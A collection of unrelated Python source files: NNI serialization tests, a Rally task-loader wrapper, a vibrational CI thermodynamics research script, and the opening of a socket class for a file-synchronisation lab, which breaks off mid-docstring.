obj = pickle.loads(pickle.dumps(obj))
assert obj._a == 1
assert obj._b == 1
obj = SimpleClass(1)
obj.xxx = 3
obj = pickle.loads(pickle.dumps(obj))
assert obj.xxx == 3
@pytest.mark.skipif(sys.platform != 'linux', reason='https://github.com/microsoft/nni/issues/4434')
def test_multiprocessing_dataloader():
# check whether multi-processing works
# it's possible to have pickle errors
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
))
import nni.retiarii.evaluator.pytorch.lightning as pl
dataloader = pl.DataLoader(dataset, batch_size=10, num_workers=2)
x, y = next(iter(dataloader))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
def _test_multiprocessing_dataset_worker(dataset):
if sys.platform == 'linux':
# on non-linux, the loaded object will become non-traceable
# due to an implementation limitation
assert is_traceable(dataset)
else:
from torch.utils.data import Dataset
assert isinstance(dataset, Dataset)
def test_multiprocessing_dataset():
from torch.utils.data import Dataset
dataset = nni.trace(Dataset)()
import multiprocessing
process = multiprocessing.Process(target=_test_multiprocessing_dataset_worker, args=(dataset, ))
process.start()
process.join()
assert process.exitcode == 0
def test_type():
assert nni.dump(torch.optim.Adam) == '{"__nni_type__": "path:torch.optim.adam.Adam"}'
assert nni.load('{"__nni_type__": "path:torch.optim.adam.Adam"}') == torch.optim.Adam
assert Foo == nni.load(nni.dump(Foo))
assert nni.dump(math.floor) == '{"__nni_type__": "path:math.floor"}'
assert nni.load('{"__nni_type__": "path:math.floor"}') == math.floor
def test_lightning_earlystop():
import nni.retiarii.evaluator.pytorch.lightning as pl
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
trainer = pl.Trainer(callbacks=[nni.trace(EarlyStopping)(monitor="val_loss")])
pickle_size_limit = 4096 if sys.platform == 'linux' else 32768
trainer = nni.load(nni.dump(trainer, pickle_size_limit=pickle_size_limit))
assert any(isinstance(callback, EarlyStopping) for callback in trainer.callbacks)
def test_pickle_trainer():
import nni.retiarii.evaluator.pytorch.lightning as pl
from pytorch_lightning import Trainer
trainer = pl.Trainer(max_epochs=1)
data = pickle.dumps(trainer)
trainer = pickle.loads(data)
assert isinstance(trainer, Trainer)
def test_generator():
import torch.nn as nn
import torch.optim as optim
class Net(nn.Module):
def __init__(self):
super().__init__()
self.conv = nn.Conv2d(3, 10, 1)
def forward(self, x):
return self.conv(x)
model = Net()
optimizer = nni.trace(optim.Adam)(model.parameters())
print(optimizer.trace_kwargs)
def test_arguments_kind():
def foo(a, b, *c, **d):
pass
d = nni.trace(foo)(1, 2, 3, 4)
assert d.trace_args == [1, 2, 3, 4]
assert d.trace_kwargs == {}
d = nni.trace(foo)(a=1, b=2)
assert d.trace_kwargs == dict(a=1, b=2)
d = nni.trace(foo)(1, b=2)
# this is not perfect, but it's safe
assert d.trace_kwargs == dict(a=1, b=2)
def foo(a, *, b=3, c=5):
pass
d = nni.trace(foo)(1, b=2, c=3)
assert d.trace_kwargs == dict(a=1, b=2, c=3)
import torch.nn as nn
lstm = nni.trace(nn.LSTM)(2, 2)
assert lstm.input_size == 2
assert lstm.hidden_size == 2
assert lstm.trace_args == [2, 2]
lstm = nni.trace(nn.LSTM)(input_size=2, hidden_size=2)
assert lstm.trace_kwargs == {'input_size': 2, 'hidden_size': 2}
def test_subclass():
@nni.trace
class Super:
def __init__(self, a, b):
self._a = a
self._b = b
class Sub1(Super):
def __init__(self, c, d):
super().__init__(3, 4)
self._c = c
self._d = d
@nni.trace
class Sub2(Super):
def __init__(self, c, d):
super().__init__(3, 4)
self._c = c
self._d = d
obj = Sub1(1, 2)
# There could be trace_kwargs for obj. Behavior is undefined.
assert obj._a == 3 and obj._c == 1
assert isinstance(obj, Super)
obj = Sub2(1, 2)
assert obj.trace_kwargs == {'c': 1, 'd': 2}
assert issubclass(type(obj), Super)
assert isinstance(obj, Super)
def test_get():
@nni.trace
class Foo:
def __init__(self, a = 1):
self._a = a
def bar(self):
return self._a + 1
obj = Foo(3)
assert nni.load(nni.dump(obj)).bar() == 4
obj1 = obj.trace_copy()
with pytest.raises(AttributeError):
obj1.bar()
obj1.trace_kwargs['a'] = 5
obj1 = obj1.get()
assert obj1.bar() == 6
obj2 = obj1.trace_copy()
obj2.trace_kwargs['a'] = -1
assert obj2.get().bar() == 0
def test_model_wrapper_serialize():
from nni.retiarii import model_wrapper
@model_wrapper
class Model(nn.Module):
def __init__(self, in_channels):
super().__init__()
self.in_channels = in_channels
model = Model(3)
dumped = nni.dump(model)
loaded = nni.load(dumped)
assert loaded.in_channels == 3
def test_model_wrapper_across_process():
main_file = os.path.join(os.path.dirname(__file__), 'imported', '_test_serializer_main.py')
subprocess.run([sys.executable, main_file, '0'], check=True)
subprocess.run([sys.executable, main_file, '1'], check=True)
|
rally.py | import os
from threading import Thread
import logging
import sys
from rally.cli.commands.task import TaskCommands
from rally.plugins import load as load_plugins
from rally.api import API
from rally.cli.commands.deployment import DeploymentCommands
from rally.plugins import load as load_plugins
from rally.exceptions import DBRecordNotFound
from enyo.config import Config
from . import BaseLoader
from enyo.utils.custom_logger import CustomLogger, DEFAULT_LOG_FORMAT
from enyo.reporters.rally import RallyReporter
config = Config()
LOG_FILE = os.path.join(config.get_value('log_dir'), 'loader-rally.log')
logger = CustomLogger(LOG_FILE, name=__name__)
RALLY_LOG_FILE = os.path.join(config.get_value('log_dir'), 'rally/task.log')
class Rally(BaseLoader):
def __init__(self, task_file, deployment=None, task_args=None, task_args_file=None, config_file=None):
self.rally_api = API()
self._modify_logger()
self.task = TaskCommands()
self.task_init_timeout = 200
self.deployment_name = deployment
self.task_file = task_file
self.task_thread = Thread(target=self.run)
self.create_or_use_deployment()
self.input_task = self.task._load_and_validate_task(self.rally_api, self.task_file,
raw_args=task_args,
args_file=task_args_file)
self.task_instance = self.rally_api.task.create(deployment=self.deployment_name)
self.task_id = self.task_instance["uuid"]
def validate(self):
print(self.task.validate(self.rally_api, self.task_file, self.deployment_name))
def start(self):
logger.info("Starting thread for rally task")
self.task_thread.start()
def run(self):
self.rally_api.task.start(deployment=self.deployment_name, config=self.input_task,
task=self.task_id)
def stop(self):
self.task.abort(self.rally_api, task_id=self.task_id)
def task_status(self):
task = self.rally_api.task.get(self.task_id)
return task["status"]
def deployment_status(self):
deployment = self.rally_api.deployment.get(self.deployment_name)
return deployment["status"]
def wait_to_finish(self):
logger.info("Waiting for rally thread to join")
self.task_thread.join()
logger.info("Finished rally thread")
def generate_report(self, output_file):
logger.info("Generating report")
output_html = output_file + ".html"
output_json = output_file + ".json"
self.task.report(self.rally_api, self.task_id, out=output_html, out_format="html")
self.task.report(self.rally_api, self.task_id, out=output_json, out_format="json")
report = RallyReporter(output_json)
report.generate_report()
logger.info("Report generated")
def create_or_use_deployment(self):
load_plugins()
try:
self.rally_api.deployment.get(self.deployment_name)
except DBRecordNotFound:
return DeploymentCommands().create(self.rally_api, self.deployment_name, fromenv=True)
def destroy_deployment(self):
self.rally_api.deployment.destroy(self.deployment_name)
def _modify_logger(self):
'''
Modify rally library logger to our requirments
'''
rally_logger = logging.getLogger("rally")
console_handler = logging.StreamHandler(sys.stdout)
rally_logger.removeHandler(console_handler)
file_handler = logging.FileHandler(RALLY_LOG_FILE)
formatter = logging.Formatter(DEFAULT_LOG_FORMAT)
file_handler.setFormatter(formatter)
rally_logger.addHandler(file_handler)
rally_logger.propagate = False
|
vci_outputFCNM.py | import numpy as np
import math
import itertools
from collections import Counter
import sys
from numpy import linalg
from numba import jit
import time
from multiprocessing import Process, Queue
import csv
from itertools import permutations
#This function is obtained from pyvci plz see github resource code
#this function is for get the combination of all excited states
#I used max number of excited level for each mode
#eg: nmode = 3, maxlvl = 8(0-7) then we have 8*8*8 combines since 0 the vacuum one counts.
#if you want to get the sum max number of states like Dr.Yagi's code plz modify this fn.
#XXX add lambda verification
#XXX add different N (maxn)
#sys.stdout = open("vci_test_output.txt","w")
#function to generate the combination
t0 = time.time()
class VCIthermo:
def __init__(self,Lambd,Temprt,maxn,calVCI):#calVCI= 1 or filename
Vref= 0
maxorder = 5
nmode = 3
filepath = "../data/prop_no_3.hs"
w_omega,FCQ3,FCQ4 = self.readSindoPES(filepath,nmode)
#linrComb = self.loopfn(nmode,maxn)
#print(len(linrComb))
#print(linrComb)
#Evlst = self.EvaluationList(nmode,w_omega,maxn,maxorder)# The list of the evaluation from Hermes xvscf table.
#if(calVCI):
# VCImtrx = self.VCImatrix(w_omega,linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd)
# Energylist, Coefficient = self.DiagonalVCI(VCImtrx)
# print("Do saveeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee")
# np.savez("../data/VCImatxSaveN_"+str(maxn)+".npz",Energylist,Coefficient)
# print("Done")
#else:
# filenameVCI = "../data/VCImatxSaveN_"+str(maxn)+".npz"
# inputfile = np.load(filenameVCI)
# Energylist= inputfile['arr_0']
# Coefficient = inputfile['arr_1']
#self.thermoresults = np.zeros((len(Temprt),3,4))
#XXX instruct: 7:7 temperatures 3: three methods 4: four variable(Xi,Omg,U,S)
#for ii in range(len(Temprt)):
# self.ThemoCalc(Temprt[ii],Energylist,self.thermoresults[ii,0,:])
# self.FiniteBE(Temprt[ii],w_omega,maxn,self.thermoresults[ii,2,:])
# if (maxn == 6):
# self.Bose_EinsteinStat(Temprt[ii],w_omega,self.thermoresults[ii,1,:])
#if(maxn == 20):
def loopfn(self,n,maxn):
if n>1:
rt = []
for x in range(maxn):
k = self.loopfn(n-1,maxn)
for i in range(len(k)):
k[i].append(x)
rt += k
return rt
else:
rt = []
for x in range(maxn):
rt.append([x])
return rt
#It reads in the QFF force constants
def readSindoPES(self,filepath,nmode):
w_omega = np.zeros(nmode)
FCQ3 = np.zeros((nmode,nmode,nmode)) #Coefficient in Q (normal coordinates)
#XXX Coefficient includes the 1/2 1/3! 1/4! in the front!!
#Dr.Yagi used dimensionless q as unit so we need to transfer from q to Q by times sqrt(w1*w2*.../hbar^(...))
FCQ4 = np.zeros((nmode,nmode,nmode,nmode))
with open(filepath) as f:
flines = f.readlines()
for idx in range(len(flines)):
if( len(flines[idx].split())>1):
if (flines[idx].split()[1] == "Hessian(i,i)"):
tl = flines[idx+1].split()#shortcut for this line
leng= len(tl)
if (leng == 2):
for i in range(nmode):
tl2 = flines[idx+1+i].split()
w_omega[i] = math.sqrt(float(tl2[1]))
#print("Hessian",math.sqrt(float(tl2[1])/(1.88973**2*math.sqrt(1822.888486**2)))*219474.63)
if (flines[idx].split()[1] == "Cubic(i,i,i)"):
for i in range(nmode):
tl = flines[idx+1+i].split()#shortcut for this line
FCQ3[int(tl[0])-1,int(tl[0])-1,int(tl[0])-1] = float(tl[1])
#print("Cubic3",tl[1])
if (flines[idx].split()[1] == "Cubic(i,i,j)"):
for i in range(nmode*2):
tl = flines[idx+1+i].split()#shortcut for this line
listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1]
perm = permutations(listidx)
for i in list(perm):
FCQ3[i[0],i[1],i[2]] = float(tl[2])
#print("Cubic2",tl[2])
if (flines[idx].split()[1] == "Cubic(i,j,k)"):
tl = flines[idx+1].split()#shortcut for this line
listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[2])-1]
perm = permutations(listidx)
for i in list(perm):
FCQ3[i[0],i[1],i[2]] = float(tl[3])
#print("Cubic1",tl[3])
if (flines[idx].split()[1] == "Quartic(i,i,i,i)"):
for i in range(nmode):
tl = flines[idx+1+i].split()#shortcut for this line
FCQ4[int(tl[0])-1,int(tl[0])-1,int(tl[0])-1,int(tl[0])-1] = float(tl[1])
#print("Quar4",tl[1])
if (flines[idx].split()[1] == "Quartic(i,i,j,j)"):
for i in range(nmode):
tl = flines[idx+1+i].split()#shortcut for this line
listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1,int(tl[1])-1]
perm = permutations(listidx)
for i in list(perm):
FCQ4[i[0],i[1],i[2],i[3]] = float(tl[2])
#print("Quar22",tl[2])
if (flines[idx].split()[1] == "Quartic(i,i,i,j)"):
for i in range(nmode*2):
tl = flines[idx+1+i].split()#shortcut for this line
listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[0])-1,int(tl[1])-1]
perm = permutations(listidx)
for i in list(perm):
FCQ4[i[0],i[1],i[2],i[3]] = float(tl[2])
#print("Quar21",tl[2])
if (flines[idx].split()[1] == "Quartic(i,i,j,k)"):
for i in range(nmode):
tl = flines[idx+1+i].split()#shortcut for this line
listidx = [int(tl[0])-1,int(tl[0])-1,int(tl[1])-1,int(tl[2])-1]
perm = permutations(listidx)
for i in list(perm):
FCQ4[i[0],i[1],i[2],i[3]] = float(tl[3])
#print("Quar3",tl[3])
FCQ3 = np.true_divide(FCQ3,(1.88973**3*math.sqrt(1822.888486**3)))
FCQ4 = np.true_divide(FCQ4,(1.88973**4*math.sqrt(1822.888486**4)))
w_omega = np.true_divide(w_omega,math.sqrt(1.88973**2*1822.888486))
w_omega = w_omega**2
afix = "\n"
#Hessian
with open("./derivs_H2O_D2V.d_nm","w") as f:
for i in range(nmode):
for j in range(i,nmode):
if (i==j):
f.writelines(str(w_omega[i])+afix)
else:
f.writelines(str(0)+afix)
#FCQ3
with open("./derivs_H2O_D3V.d_nm","w") as f:
for i in range(nmode):
for j in range(i,nmode):
for k in range(j,nmode):
f.writelines(str(FCQ3[i,j,k])+afix)
#FCQ4
with open("./derivs_H2O_D4V.d_nm","w") as f:
for i in range(nmode):
for j in range(i,nmode):
for k in range(j,nmode):
for l in range(k,nmode):
f.writelines(str(FCQ4[i,j,k,l])+afix)
#FCQ4[key] /= (1.88973**4*math.sqrt(1822.888486**4))
#FCQ3 /= (1.88973**3*math.sqrt(1822.888486**3))
#for idx in range(Omgstartidx+1,FCstartidx):
# w_omega[widx] = float(tl[0])
# widx += 1
#for idx in range(FCstartidx+1, len(flines)):
# tl = flines[idx].split()#shortcut for this line
# leng = len(tl)
# if (leng == 4):
# #third order force constant
# #FCQ3[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1] = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1])
# temp1 = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1])
# FCQ3[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1] = temp1
# FCQ3[int(tl[1])-1,int(tl[3])-1,int(tl[2])-1] = temp1
# FCQ3[int(tl[2])-1,int(tl[1])-1,int(tl[3])-1] = temp1
# FCQ3[int(tl[2])-1,int(tl[3])-1,int(tl[1])-1] = temp1
# FCQ3[int(tl[3])-1,int(tl[1])-1,int(tl[2])-1] = temp1
# FCQ3[int(tl[3])-1,int(tl[2])-1,int(tl[1])-1] = temp1
# if (leng == 5):
# #forth order force constant
# #FCQ4[int(tl[1])-1,int(tl[2])-1,int(tl[3])-1,int(tl[4])-1] = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]*w_omega[int(tl[4])-1])
# temp2 = float(tl[0])*math.sqrt(w_omega[int(tl[1])-1]*w_omega[int(tl[2])-1]*w_omega[int(tl[3])-1]*w_omega[int(tl[4])-1])
# perm = permutations([1,2,3,4])
# for i in list(perm):
# FCQ4[int(tl[i[0]])-1,int(tl[i[1]])-1,int(tl[i[2]])-1,int(tl[i[3]])-1] = temp2
HatreeTocm = 219474.63
#print("harmonic oscilator:")
#print(w_omega[0]*HatreeTocm)
#print(w_omega[1]*HatreeTocm)
#print(w_omega[2]*HatreeTocm)
#print("Harmonic ZPE")
#print(np.sum(w_omega)/2*HatreeTocm)
return w_omega,FCQ3,FCQ4
def EvaluationList(self,nmode,w_omega,maxn,maxorder):
#I used the combination to determine which operator can give us result.
#The 1st is to indicate which normal mode is it.
#The 2nd is to indicate which operator: 0-5 : zero(no operator, assume the basis function is orthogonal, partial deriv Q^2, Q, Q^2, Q^3, Q^4. Here we used QFF so the max order of operator is 4 and total number is 5
#The 3rd is to the which level n is, n is the bigger one than n'
#The 4th is the difference between n and n'
Evlst = np.zeros((nmode,maxorder,maxn,maxorder))
for i in range(nmode):
for n in range(maxn):
Evlst[i,0,n,0] = - w_omega[i]*(n+0.5)
Evlst[i,0,n,2] = w_omega[i]*math.sqrt(n*(n-1))/2
Evlst[i,1,n,1] = math.sqrt(n/2/w_omega[i])
Evlst[i,2,n,0] = (n+0.5)/w_omega[i]
Evlst[i,2,n,2] = math.sqrt(n*(n-1))/2/w_omega[i]
Evlst[i,3,n,1] = 3*n/2/w_omega[i]*math.sqrt(n/2/w_omega[i])
Evlst[i,3,n,3] = math.sqrt(n*(n-1)*(n-2))/(2*w_omega[i]*math.sqrt(2*w_omega[i]))
Evlst[i,4,n,0] = (6*n*(n+1)+3)/4/(w_omega[i]**2)
Evlst[i,4,n,2] = (n-0.5)*math.sqrt(n*(n-1))/(w_omega[i]**2)
Evlst[i,4,n,4] = math.sqrt(n*(n-1)*(n-2)*(n-3))/4/(w_omega[i]**2)
return Evlst
def VCImatrix(self,w_omega,linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd):
leng = len(linrComb)
VCImtrx = np.zeros((leng,leng))
#VCI matrix is Hermitian
for i in range(leng):
for j in range(i,leng):
lhs = linrComb[i]
rhs = linrComb[j]
sumofoperator = 0
#parse each operator first
#operator partial deriv:
for optidx in range(nmode):
#parse each mode in |xxxx>
multply = 1 #the multiply product of each mode
for modeidx in range(nmode):
n = max(lhs[modeidx],rhs[modeidx])
diff = abs(lhs[modeidx] - rhs[modeidx])
if (modeidx == optidx and diff < maxorder): #the operator works on the correspoding Q
multply *= -0.5*Evlst[modeidx,0,n,diff]
else: #check if they are orthogonal if not, then zero
if (diff!=0):
multply *= 0
break
sumofoperator += multply
#operator Vref
#Vref is a constant so only orthogonal can give the value
multply = 1
for modeidx in range(nmode):
diff = abs(lhs[modeidx] - rhs[modeidx])
if (diff!=0):
multply *=0
break
sumofoperator += multply*Vref
#operator sum FiQi
#for harmonic oscilator Fi = 0 so we pass this term
#Fij = w_omega ^2 for i == j
for forceidx in range(nmode):
multply = 1
#print(" For F_ii i is ",forceidx)
for modeidx in range(nmode):
diff = abs(lhs[modeidx] - rhs[modeidx])
n = max(lhs[modeidx],rhs[modeidx])
if (forceidx == modeidx and diff < maxorder):
multply *= 0.5*Evlst[modeidx,2,n,diff]
else:
if (diff !=0):
multply *= 0
break
multply*=(w_omega[forceidx]**2)
sumofoperator += multply
#print("------------------")
#print("For Fijk ")
#operator sum Fijk Qi Qj Qk
for ii in range(nmode):
for jj in range(nmode):
for kk in range(nmode):
multply = 1
eachcount = Counter([ii,jj,kk])
tempstore = []
for modeidx in range(nmode):
diff = abs(lhs[modeidx] - rhs[modeidx])
n = max(lhs[modeidx],rhs[modeidx])
numberofmodeinFC = eachcount[modeidx]
if (numberofmodeinFC != 0 and diff < maxorder):
multply*= Evlst[modeidx,numberofmodeinFC,n,diff]
else:
if(diff != 0):
multply*=0
break
multply *= FCQ3[ii,jj,kk]
sumofoperator+=Lambd*multply/6
#operator sum Fijkl Qi Qj Qk Ql
for ii in range(nmode):
for jj in range(nmode):
for kk in range(nmode):
for ll in range(nmode):
multply = 1
eachcount = Counter([ii,jj,kk,ll])
for modeidx in range(nmode):
diff = abs(lhs[modeidx] - rhs[modeidx])
n = max(lhs[modeidx],rhs[modeidx])
numberofmodeinFC = eachcount[modeidx]
if (numberofmodeinFC != 0 and diff < maxorder):
multply*= Evlst[modeidx,numberofmodeinFC,n,diff]
else:
if(diff!=0):
multply*=0
break #break the innerest loop since they will be all zero.
multply*=FCQ4[ii,jj,kk,ll]
sumofoperator+=Lambd*multply/24
VCImtrx[i,j] = VCImtrx[j,i] = sumofoperator
return VCImtrx
def DiagonalVCI(self,VCImtrx):
w,v = linalg.eigh(VCImtrx)
HatreeTocm = 219474.63
print(w)
#for i in range(len(w)):
# print("_+++++++++++++++++++++++++++++++++++++")
# print(w[i]*HatreeTocm)
# print("Then the Coeff")
# print(v[:,i])
#print(w*HatreeTocm)
#print(np.sum(w))
#print((w[1] -w[0])*219474.63)
#print((w[2] -w[0])*219474.63)
#print((w[3] -w[0])*219474.63)
#print((w[4] -w[0])*219474.63)
#print((w[5] -w[0])*219474.63)
return w,v
def ThemoCalc(self,Temprt,Energylist,ret):
#kb = 1 at a.u.
#Calculate Grand partition function, grand potential and internal energy based on grand canonical ensemble.
#Grand partition function: GPF
b_beta = 1/(Temprt)
print(b_beta)
GPF_Xi = 0
print(np.sum(Energylist))
for eachE in Energylist:
GPF_Xi += math.exp(-b_beta*eachE)
#grand potential
GP_Omg = -math.log(GPF_Xi)/b_beta
#internal energy U
IE_U = 0
for eachE in Energylist:
IE_U += eachE*math.exp(-b_beta * eachE)
IE_U/=GPF_Xi
#entropy S
entropy_S = 0
#just for math domain error
for eachE in Energylist:
entropy_S += eachE*math.exp(-b_beta*eachE)
entropy_S /= (Temprt*GPF_Xi)
entropy_S += math.log(GPF_Xi)
ret[0] = GPF_Xi
ret[1] = GP_Omg
ret[2] = IE_U
ret[3] = entropy_S
print("Xi, Omg, U ,S is")
#print(GPF_Xi)
#print(IE_U)
#print(entropy_S)
print("verify")
print(GP_Omg)
print(IE_U-Temprt*entropy_S)
#Bose-Einstein statistics
def Bose_EinsteinStat(self,Temprt,w_omega,ret):
b_beta= 1/Temprt
#f_i
f_i = np.zeros(len(w_omega))
for i in range(len(w_omega)):
f_i[i] = 1/(1-math.exp(-b_beta*w_omega[i]))
print(f_i)
#partition function
GPF_Xi = 1
for ii in range(len(w_omega)):
#GPF_Xi *= math.exp(-b_beta*eachw/2)/(1-math.exp(-b_beta*eachw))
GPF_Xi *= math.exp(-b_beta*w_omega[ii]/2)*f_i[ii]
#grand potential
GP_Omg = 0
for eachw in w_omega:
GP_Omg += 0.5*eachw + math.log(1-math.exp(-b_beta*eachw))/b_beta
#internal energy
IE_U = 0
for eachw in w_omega:
IE_U += 0.5*eachw + eachw*math.exp(-b_beta*eachw)/(1-math.exp(-b_beta*eachw))
#entropy
entropy_S = 0
for eachw in w_omega:
entropy_S += - math.log(1-math.exp(-b_beta*eachw)) + eachw*math.exp(-b_beta*eachw)/(Temprt*(1-math.exp(-b_beta*eachw)))
ret[0] = GPF_Xi
ret[1] = GP_Omg
ret[2] = IE_U
ret[3] = entropy_S
#print("analytical Bose-Einstein stat result:")
#print("Xi, Omg, U ,S is")
#print(GPF_Xi)
#print(IE_U)
#print(entropy_S)
#print("verify")
#print(GP_Omg)
#print(IE_U-Temprt*entropy_S)
#FCI bose-einstein with finite N
def FiniteBE(self,Temprt,w_omega,maxn,ret):
N = maxn -1
b_beta = 1/Temprt
f_i = np.zeros(len(w_omega))
tildef_i = np.zeros(len(w_omega))
for i in range(len(w_omega)):
f_i[i] = 1/(1 - math.exp(- b_beta * w_omega[i]))
tildef_i[i] = 1/(1 - math.exp( - b_beta * (N+1) * w_omega[i]))
#partition function
GPF_Xi = 1
for eachw in w_omega:
GPF_Xi *= math.exp(-b_beta*eachw/2)*(1-math.exp(-b_beta*(N+1)*eachw))/(1-math.exp(-b_beta*eachw))
#Grand Potential
GP_Omg = 0
for ii in range(len(w_omega)):
GP_Omg += 0.5 * w_omega[ii] - math.log(f_i[ii]/tildef_i[ii])/b_beta
#Internal Energy
IE_U = 0
for ii in range(len(w_omega)):
IE_U += 0.5 * w_omega[ii] + w_omega[ii]*(f_i[ii] - 1) - (N + 1) * w_omega[ii] * (tildef_i[ii] - 1)
#entropy S
entropy_S = 0
for ii in range(len(w_omega)):
entropy_S += (math.log(f_i[ii]/tildef_i[ii])/b_beta + w_omega[ii]*(f_i[ii]-1) - (N+1)*w_omega[ii]*(tildef_i[ii]-1))/Temprt
ret[0] = GPF_Xi
ret[1] = GP_Omg
ret[2] = IE_U
ret[3] = entropy_S
#print("finite analytical Bose-Einstein stat result:")
#print("Xi, Omg, U ,S is")
#print(GPF_Xi)
#print(IE_U)
#print(entropy_S)
#print("verify")
#print(IE_U-Temprt*entropy_S)
#print(GP_Omg)
def multitask(Temprt,Energylist,thermoresults):
for ii in range(len(Temprt)):
ThemoCalc(Temprt[ii],Energylist,thermoresults[ii,0,:])
Bose_EinsteinStat(Temprt[ii],w_omega,thermoresults[ii,1,:])
FiniteBE(Temprt[ii],w_omega,maxn,thermoresults[ii,2,:])
#np.save("../data/thermoresult_Lambda0",thermoresults)
def Parallel_VCI(maxn,Lambd,Temprt,calVCI):
vcirun = VCIthermo(Lambd,Temprt,maxn,calVCI)
np.save("../data/Temprtgrid_n_"+str(maxn)+".npy",vcirun.thermoresults)
#def Parallel_VCI(Temprt,maxn,Lambd,idx):
# filename = "../data/figuremakingup_"+str(idx)+".csv"
# vcirun = VCIthermo(Lambd,Temprt,maxn,calVCI)
# reslt = vcirun.thermoresults
# if (len(reslt[:,0,0])!= 1):
# print("error")
# with open(filename,'w') as csvfile:
# csvwriter = csv.writer(csvfile)
# for i in range(3):
# #for ii in range(len(Temprt)):
# csvwriter.writerow([reslt[0,i,0],reslt[0,i,1],reslt[0,i,2],reslt[0,i,3]])
#number of normal mode like H2O is 3 here I mannuly set up but later can read in from input file
#nmode = 3
#maxium number of excited level for each mode.
maxnlist = [4,6]#8,10,12,14,16,18,20]
#maxium order of force field like QFF is 5 since we have kinetic operator at front
#maxorder = 5
#by default Vref = 0
#Vref = 0
#Temperature unit is K then transfer to a.u. by 3.1577464*10^5 ( Eh/kb)
Ehbykb = 3.1577464*100000
#Temprt = np.array([100,1000,10000,100000,1000000,10000000,100000000])
Tlist = np.arange(2,8.1,0.1)
Temprt = np.zeros(np.shape(Tlist))
for i in range(np.shape(Tlist)[0]):
Temprt[i] = 10**(Tlist[i])
Temprt = Temprt/Ehbykb
calVCI= 0
Lambd = 1
maxn = 16
vcirun = VCIthermo(Lambd,Temprt,maxn,calVCI)
#linrComb = loopfn(nmode,maxn)
#filepath = "../data/prop_no_1.mop"
#Lambdlist = [0.3,0.2,0.1,0.01,0.001,0.0001]
#w_omega,FCQ3,FCQ4 = readSindoPES(filepath,nmode)
#Evlst = EvaluationList(nmode,w_omega,maxn,maxorder)# The list of the evaluation from Hermes xvscf table.
#VCImtrx = VCImatrix(linrComb,Evlst,nmode,maxorder,FCQ3,FCQ4,Vref,Lambd)
#Energylist, Coefficient = DiagonalVCI(VCImtrx)
#XXX instruct: 7:7 temperatures 3: three methods 4: four variable(Xi,Omg,U,S)
# diffN for 7 temperature
#procs = []
#for ii in range(len(maxnlist)):
# proc = Process(target = Parallel_VCI, args= (Temprt,maxnlist[ii],Lambd))
# procs.append(proc)
# proc.start()
#for procc in procs:
# procc.join()
#temprtlist = np.array([500,5000,50000,100000,100000])
#temprtlist = temprtlist/Ehbykb
#procs = []
#for ii in range(len(maxnlist)):
# proc = Process(target = Parallel_VCI, args= ([maxnlist[ii],Lambd,Temprt,calVCI]))
# procs.append(proc)
# proc.start()
#for procc in procs:
# procc.join()
#multitask(Temprt,Energylist,thermoresults)
t1 = time.time()
print("time is /min",(t1-t0)/60)
#sys.stdout.close()
|
SocketClass.py | #!/usr/bin/python3
'''
Name: Sagnik Hajra
ID: 1001851338
'''
import socket
import time
import os
import json
import threading
import file_exchange_client
import file_exchange_server
class SocketClass:
def __init__(self, add, port, server=False, clientLimit=10):
self.ADDRESS = add
self.PORT = port
self.HEADER_SIZE = 10
self.MSG_SIZE = 1024
self.FORMAT = 'utf-8'
self.command = ''
self.DELAY_TIME = 0.1
self.WELCOME = "WELCOME"
self.INVALID_COMMAND = "INVALID"
self.CONNECTION_CLOSE = "CONNECTION_CLOSE"
# When one server is scanning files at directories, all requests for file metadata has to wait.
# The flag used for that is self.scanning
self.scanning = False
# dict(list) :- for modification time and size in bytes.
# Will have two keys, one for deleted and another for existing files.
self.own_file_meta_data = {}
self.file_metadata_index = []
self.locked_file = set()
self.delete_queue = set()
# dict(list) :- Keeps track of the other server file metadata
self.others_file_meta_data = {}
self.client_command = "lab3"
self.exit = "exit"
self.success = "Successful"
self.metadata = "metadata"
self.file_data = "file_data"
self.FILE_SENT = "File is sent"
self.file_metadata_key = "file_metadata"
self.deleted_key = "deleted"
self.accepted_commands = {self.client_command, self.file_data, self.metadata, self.exit}
self.file_deleted = {}
self.file_transaction_complete = True
self.messages = {
self.WELCOME: "Welcome to server..:",
self.INVALID_COMMAND: "Command not found",
self.CONNECTION_CLOSE: "Closing the connection...",
self.success: "Request handled successfully..."
}
# For the 1st purpose: All server will be listening to one port(server port) to accept client requests
if server:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((self.ADDRESS, self.PORT))
self.socket.listen(clientLimit)
print(f"{self.ADDRESS} started listening on port number {self.PORT}....")
# For the second purpose: To send query to other servers to keep the file directory in sync
else:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((self.ADDRESS, self.PORT))
def receive(self, sock):
"""
:param sock: socket object which is expected to receive some message from a client/server
:return: Parse and combine all the message(s). Return when combined will have the exact length+self.HEADER_SIZE
"""
command = ''
new_msg = True
msgLen = 0
while True:
msg = sock.recv(self.MSG_SIZE)
if new_msg and msg:
msgLen = int(msg[:self.HEADER_SIZE])
new_msg = False
command += msg.decode(self.FORMAT)
if len(command) - self.HEADER_SIZE == msgLen:
return command[self.HEADER_SIZE:]
def send(self, return_msg, sock, sleep=0):
""""
:param return_msg: The message that needs to be sent to a client/server
:param sock: socket object which is expected to receive some message from a client
